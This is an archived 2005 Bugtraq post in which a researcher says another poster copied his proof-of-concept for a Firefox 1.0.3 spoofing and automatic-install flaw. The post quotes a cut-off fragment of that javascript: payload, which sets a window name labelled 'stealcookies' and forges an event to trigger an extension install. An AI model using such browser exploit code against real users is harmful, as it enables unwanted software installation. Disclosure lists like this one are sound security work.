lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: 8 May 2005 13:01:48 -0000 From: Paul <paul@...yhats.cjb.net> To: bugtraq@...urityfocus.com Subject: Re: firefox 1.0.3 spoof+auto dl In-Reply-To: <20050507173037.20610.qmail@....securityfocus.com> This is the copy of my PoC. The person responsible for the leak of my remote compromise is the starter of this thread. In fact, he copies some of the code directly from my PoC: javascript:'<noscript>'+eval('if (window.name!=\'stealcookies\'){window.name=\'stealcookies\';} else{ event={target:{href:\'http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install(event,\'You are vulnerable!!! That is the window name, object creater, even direct string copies from my site. This guy is incredible. Paul
Powered by blists - more mailing lists